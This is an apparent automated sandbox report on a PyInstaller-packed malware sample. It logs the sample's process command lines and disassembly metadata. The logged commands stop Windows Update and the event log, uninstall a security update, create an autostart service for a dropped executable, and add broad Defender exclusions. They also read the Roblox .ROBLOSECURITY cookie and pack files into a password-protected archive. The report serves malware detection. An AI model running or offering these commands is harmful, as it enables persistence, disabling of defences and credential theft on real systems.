                                                            File size:345'088 bytes
                                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:77
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:78
                                                            Start time:00:31:11
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:79
                                                            Start time:00:31:12
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:81
                                                            Start time:00:31:12
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:82
                                                            Start time:00:31:12
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:83
                                                            Start time:00:31:12
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:84
                                                            Start time:00:31:12
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:85
                                                            Start time:00:31:12
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:86
                                                            Start time:00:31:12
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:87
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:88
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe delete "JLDYOGXF"
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:89
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:90
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:91
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto"
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:92
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:93
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:94
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe start "JLDYOGXF"
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:95
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:96
                                                            Start time:00:31:13
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:97
                                                            Start time:00:31:14
                                                            Start date:09/09/2024
                                                            Path:C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
                                                            Imagebase:0x7ff771db0000
                                                            File size:2'657'280 bytes
                                                            MD5 hash:1505B202551976B8543C4B233F50FCA8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 92%, ReversingLabs
                                                            Has exited:true

                                                            General

                                                            Target ID:98
                                                            Start time:00:31:14
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:99
                                                            Start time:00:31:14
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:100
                                                            Start time:00:31:16
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:101
                                                            Start time:00:31:16
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:102
                                                            Start time:00:31:16
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:103
                                                            Start time:00:31:16
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:104
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\wusa.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                            Imagebase:0x7ff6a5470000
                                                            File size:345'088 bytes
                                                            MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:105
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:106
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:107
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:108
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:109
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop bits
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:110
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:111
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                            Imagebase:0x7ff649ba0000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:112
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:113
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:114
                                                            Start time:00:31:17
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:explorer.exe
                                                            Imagebase:0x7ff72b770000
                                                            File size:5'141'208 bytes
                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            General

                                                            Target ID:117
                                                            Start time:00:31:21
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *"
                                                            Imagebase:0x7ff67e6f0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:118
                                                            Start time:00:31:21
                                                            Start date:09/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FF623F789E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                              • API String ID: 3832162212-3165540532
                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                              • Instruction ID: 3aed286d157e905c324ad3ef33acb293cc86873df8d4c6a5941c2f645d6a3416
                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                              • Instruction Fuzzy Hash: 1DD16D32A08A8286EF108F35FC566A93760FF84B58F404275DA5EA7AA4DF3CD645C701
                                                              Function 00007FF623F71000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorFileLastModuleName
                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                              • API String ID: 2776309574-3273434969
                                                              • Opcode ID: b624a4fb33a21cc5dde6f4a93f73e7183d1c06b346a65a5ccd57e4aac9cd74fc
                                                              • Instruction ID: 7711b14714017a278529e09c4c39fb9cd508be72dace2bf859efe74b3414ff9c
                                                              • Opcode Fuzzy Hash: b624a4fb33a21cc5dde6f4a93f73e7183d1c06b346a65a5ccd57e4aac9cd74fc
                                                              • Instruction Fuzzy Hash: 07329121A0C682A1FF15DB25BD572F922A1AF44780F4440B6DA4DEB2D6EF2CE759C343
                                                              Function 00007FF623F96964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                              • String ID:
                                                              • API String ID: 1617910340-0
                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                              • Instruction ID: 286e93c58231b938e16619de27d165c900ed2f0c7965bdbb7e73cdadd1c0a804
                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                              • Instruction Fuzzy Hash: DFC1F332B28A8185EF10CF65E8926AC3761FB49BA8F014275DE1EAB7D4DF38D651C301
                                                              Function 00007FF623F783C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F7842B
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784AE
                                                              • DeleteFileW.KERNELBASE(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784CD
                                                              • FindNextFileW.KERNELBASE(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784DB
                                                              • FindClose.KERNEL32(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784EC
                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF623F78919,00007FF623F73F9D), ref: 00007FF623F784F5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                              • String ID: %s\*
                                                              • API String ID: 1057558799-766152087
                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                              • Instruction ID: 0f2e9311231d59829123f820d5917aa47f6268b5efa6278cb531c73f6ed9f6bd
                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                              • Instruction Fuzzy Hash: 1E419121A0C54281EE209F24FC465BA6360FB94794F804272EA9EE76D4EF7CDB45C702
                                                              Function 00007FF623F79280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
